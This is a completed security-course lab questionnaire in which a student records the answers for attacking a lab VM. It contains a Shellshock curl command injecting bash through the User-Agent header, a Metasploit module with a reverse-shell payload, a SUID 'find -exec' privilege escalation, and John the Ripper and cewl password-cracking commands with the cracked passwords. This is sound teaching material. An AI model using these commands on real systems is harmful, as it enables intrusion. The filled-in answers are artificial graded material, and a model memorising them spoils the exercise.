Assignment Questionnaire
========================

NOTE: DO NOT DELETE --> and <--, and place your answers within the marks.
  Example:
    -->
      130.207.7.210, scouter.cc.gatech.edu
    <--


Info
====

Example:
  Your GT Login ID: kpark21
  Your Name: Kyuhong Park

-->
  Your GT Login ID: jcullen33
  Your Name: John Cullen
<--

Task 1
=======

1. What is the IP address of the vulnerable VM on the NAT network?

Example:
  IP : 10.0.2.3
-->
  IP : 10.0.2.5
<--


2. Which port receives http traffic on the vulnerable VM.

Example:
  Port : 73

-->
  Port : 80
<--

3. List each port whose service name is shown as "unknown", and the message obtained by connecting to that port.

Example:
  Port : 9095
  Answer : 1307941078
  Port : 9096
  Answer : 1766490697
  Port : 9097
  Answer : -972928378
  Port : 9098
  Answer : 73401510
  Port : 9099
  Answer : 2027631930
-->
  Port : 9095
  Answer : 1307941078
  Port : 9096
  Answer : 1766490697
  Port : 9097
  Answer : -972928378
  Port : 9098
  Answer : 73401510
  Port : 9099
  Answer : 2027631930
<--


Task 2
=======

1. What command did you use to exploit the shellshock vulnerability?

Example:
  Command : curl http://10.0.2.1:6262/cgi-bin/shellshock.cgi

-->
  Command : curl --http0.9 --output - -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/task2 jcullen33'" 10.0.2.5/cgi-bin/shellshock.cgi
<--


2. What hash value is returned by running ./bin/task2 with your student ID.

-->
  Hash : 6e46998e54b213ff40c23c7bdf58bedec800d33e57224519fa4c45904f17bcaa
<--


Task 3
=======

1. Give the full name of the exploit module you used.

Example:
  Module : auxiliary/scanner/portscan/tcp

-->
  Module : exploit/multi/http/apache_mod_cgi_bash_env_exec
<--


2. Give the full name of the payload you used:

Example:
  Payload : auxiliary/scanner/portscan/tcp

-->
  Payload : linux/x86/shell/reverse_tcp
<--


3. What hash value is returned by running ./bin/task3 with your student ID.

-->
  Hash : 0ec14219d0d5a29fe5067dfd36e18a7b7ca2542c09296ce78b2a1663f5cdc480
<--


Task 4
=======

1. What command did you use to find the program with the vulnerable setUID bit (assume the command is being rurn from the /usr/bin directory).

Example:
  Command : find . php

-->
  Command : find / -perm -u=s -type f 2>/dev/null
<--


2. Give the name of the vulnerable program in /usr/bin.

Example:
  Program : passwd

-->
  Program : find
<--


3. What command did you use to exploit the setUID vulnerability to spawn a shell.

-->
  Command : find . -exec /bin/task4 jcullen33 \;
<--


4. What hash value is returned by running ./bin/task4 with your student ID.

-->
  Hash : 55b8655e0a8e8d06a1db7084b2adc8d21ec56f1bb27003142eb97aba49cfa08d
<--


Task 5
=======

1. Give the John the Ripper command you used to find the password of task51.zip.

-->
  Command : zip2john ./task51.zip > ./out.txt && john ./out.txt
<--


2. What is the password for task51.zip.

Example:
  Password : 1234

-->
  Password : rt76y
<--


3. What hash value is returned by running python task51.pyc with your student ID.

-->
  Hash : 8e1b486af73544663fb1947dbb168ca30c2387b456b1241345c059edfdf41de6
<--


4. Give the cewl command you used to create your wordlist.

-->
  Command : cewl -w log -d 100 http://10.0.2.5/cgi-bin/shellshock.cgi
<--


5. Give the John the Ripper command you used to find the password of task52.pyc.gpg.

-->
  Command : john --wordlist=log --rules=All ./out2.txt
<--


6. What is the password for task52.pyc.gpg.

-->
  Password : Neuroscience9
<--


7. What hash value is returned by running python task52.pyc with your student ID.

-->
  Hash : 801413c77c7351e0f949ced1e5ab0bbf944c347cc99966201a6ed79aa0ac9942
<--
